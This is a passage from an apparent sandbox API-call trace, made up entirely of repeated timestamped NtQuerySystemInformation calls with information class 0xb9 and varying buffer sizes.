(SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.864] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.864] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.864] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce80, Length=0x20, ResultLength=0x0) [0283.864] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.864] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.864] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.864] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.864] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.864] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.865] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cde0, Length=0x50, ResultLength=0x0) [0283.865] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.865] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cde0, Length=0x50, ResultLength=0x0) [0283.865] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.865] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cde0, Length=0x50, ResultLength=0x0) [0283.865] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ccd0, Length=0x50, ResultLength=0x0) [0283.865] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.865] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ccd0, Length=0x50, ResultLength=0x0) [0283.865] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.866] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ccd0, Length=0x50, ResultLength=0x0) [0283.866] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.866] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ccd0, Length=0x50, ResultLength=0x0) [0283.866] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.866] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc00, Length=0x38, ResultLength=0x0) [0283.869] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.869] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca30, Length=0x28, ResultLength=0x0) [0283.869] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.869] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.869] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca30, Length=0x28, ResultLength=0x0) [0283.869] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.869] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.869] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca30, Length=0x28, ResultLength=0x0) [0283.870] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.870] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.870] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca30, Length=0x28, ResultLength=0x0) [0283.870] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.870] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.870] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207caa0, Length=0x28, ResultLength=0x0) [0283.870] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.870] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.870] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc00, Length=0x38, ResultLength=0x0) [0283.870] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.870] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb20, Length=0x28, ResultLength=0x0) [0283.873] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.873] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.873] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.873] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb20, Length=0x28, ResultLength=0x0) [0283.873] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c9c0, Length=0x20, ResultLength=0x0) [0283.874] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c940, Length=0x20, ResultLength=0x0) [0283.874] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.874] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c940, Length=0x20, ResultLength=0x0) [0283.874] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.874] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c940, Length=0x20, ResultLength=0x0) [0283.874] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.874] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.874] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.874] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.874] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.874] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc00, Length=0x38, ResultLength=0x0) [0283.874] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.874] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc00, Length=0x38, ResultLength=0x0) [0283.874] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca80, Length=0x20, ResultLength=0x0) [0283.874] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca10, Length=0x20, ResultLength=0x0) [0283.875] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.875] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.875] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.875] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca10, Length=0x20, ResultLength=0x0) [0283.875] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.875] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.875] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.875] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.875] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.875] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.875] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.876] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cde0, Length=0x50, ResultLength=0x0) [0283.876] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.877] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cde0, Length=0x50, ResultLength=0x0) [0283.877] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.877] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cde0, Length=0x50, ResultLength=0x0) [0283.877] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ccd0, Length=0x50, ResultLength=0x0) [0283.877] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.877] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ccd0, Length=0x50, ResultLength=0x0) [0283.877] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.877] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ccd0, Length=0x50, ResultLength=0x0) [0283.877] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.877] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ccd0, Length=0x50, ResultLength=0x0) [0283.877] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.877] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc00, Length=0x38, ResultLength=0x0) [0283.880] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.880] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca30, Length=0x28, ResultLength=0x0) [0283.880] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.880] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.880] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca30, Length=0x28, ResultLength=0x0) [0283.880] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.880] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.880] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca30, Length=0x28, ResultLength=0x0) [0283.880] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.880] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.880] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca30, Length=0x28, ResultLength=0x0) [0283.880] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.880] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.880] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207caa0, Length=0x28, ResultLength=0x0) [0283.881] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.881] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.881] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc00, Length=0x38, ResultLength=0x0) [0283.881] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.881] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb20, Length=0x28, ResultLength=0x0) [0283.884] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.884] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.884] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.884] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb20, Length=0x28, ResultLength=0x0) [0283.884] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c9c0, Length=0x20, ResultLength=0x0) [0283.884] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c940, Length=0x20, ResultLength=0x0) [0283.884] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.884] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c940, Length=0x20, ResultLength=0x0) [0283.884] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.884] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c940, Length=0x20, ResultLength=0x0) [0283.884] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.885] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.885] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.885] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.885] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.885] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc00, Length=0x38, ResultLength=0x0) [0283.885] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.885] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc00, Length=0x38, ResultLength=0x0) [0283.885] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca80, Length=0x20, ResultLength=0x0) [0283.885] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca10, Length=0x20, ResultLength=0x0) [0283.885] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.885] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.886] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.886] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca10, Length=0x20, ResultLength=0x0) [0283.886] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.886] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.887] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.887] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.887] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.887] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.887] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.887] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d1c0, Length=0x20, ResultLength=0x0) [0283.888] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.888] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.888] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cf40, Length=0x50, ResultLength=0x0) [0283.888] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.888] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cf40, Length=0x50, ResultLength=0x0) [0283.888] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.888] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cf40, Length=0x50, ResultLength=0x0) [0283.888] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce30, Length=0x50, ResultLength=0x0) [0283.888] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.888] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce30, Length=0x50, ResultLength=0x0) [0283.888] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.888] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce30, Length=0x50, ResultLength=0x0) [0283.889] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.890] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce30, Length=0x50, ResultLength=0x0) [0283.890] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.890] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd60, Length=0x38, ResultLength=0x0) [0283.892] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.892] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb90, Length=0x28, ResultLength=0x0) [0283.892] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.892] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.893] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb90, Length=0x28, ResultLength=0x0) [0283.893] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.893] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.893] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb90, Length=0x28, ResultLength=0x0) [0283.893] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.893] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.893] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc00, Length=0x28, ResultLength=0x0) [0283.893] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.893] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.893] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd60, Length=0x38, ResultLength=0x0) [0283.893] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.893] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc80, Length=0x28, ResultLength=0x0) [0283.896] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.896] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.896] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.896] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.897] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.897] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.897] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc80, Length=0x28, ResultLength=0x0) [0283.897] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.897] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.897] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd60, Length=0x38, ResultLength=0x0) [0283.897] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbe0, Length=0x20, ResultLength=0x0) [0283.898] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb60, Length=0x20, ResultLength=0x0) [0283.898] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.898] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb60, Length=0x20, ResultLength=0x0) [0283.898] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.898] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb60, Length=0x20, ResultLength=0x0) [0283.898] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.898] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.898] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.898] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.898] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd60, Length=0x38, ResultLength=0x0) [0283.898] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbe0, Length=0x20, ResultLength=0x0) [0283.898] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb70, Length=0x20, ResultLength=0x0) [0283.899] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.899] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.899] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.899] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb70, Length=0x20, ResultLength=0x0) [0283.899] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.899] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.899] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.899] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.899] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.899] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.900] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.900] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cf40, Length=0x50, ResultLength=0x0) [0283.900] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.900] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cf40, Length=0x50, ResultLength=0x0) [0283.900] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.900] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cf40, Length=0x50, ResultLength=0x0) [0283.900] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce30, Length=0x50, ResultLength=0x0) [0283.900] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.900] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce30, Length=0x50, ResultLength=0x0) [0283.900] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.900] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce30, Length=0x50, ResultLength=0x0) [0283.901] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.901] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce30, Length=0x50, ResultLength=0x0) [0283.901] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.901] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd60, Length=0x38, ResultLength=0x0) [0283.903] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.903] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb90, Length=0x28, ResultLength=0x0) [0283.903] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.903] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.903] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb90, Length=0x28, ResultLength=0x0) [0283.904] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.904] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.904] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb90, Length=0x28, ResultLength=0x0) [0283.904] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.904] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.904] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc00, Length=0x28, ResultLength=0x0) [0283.904] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.904] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.904] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd60, Length=0x38, ResultLength=0x0) [0283.904] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.904] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc80, Length=0x28, ResultLength=0x0) [0283.906] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.907] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.907] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.907] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.907] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.907] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.908] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc80, Length=0x28, ResultLength=0x0) [0283.908] NtQuerySystemInformation (SystemInformationClass=0xb9, 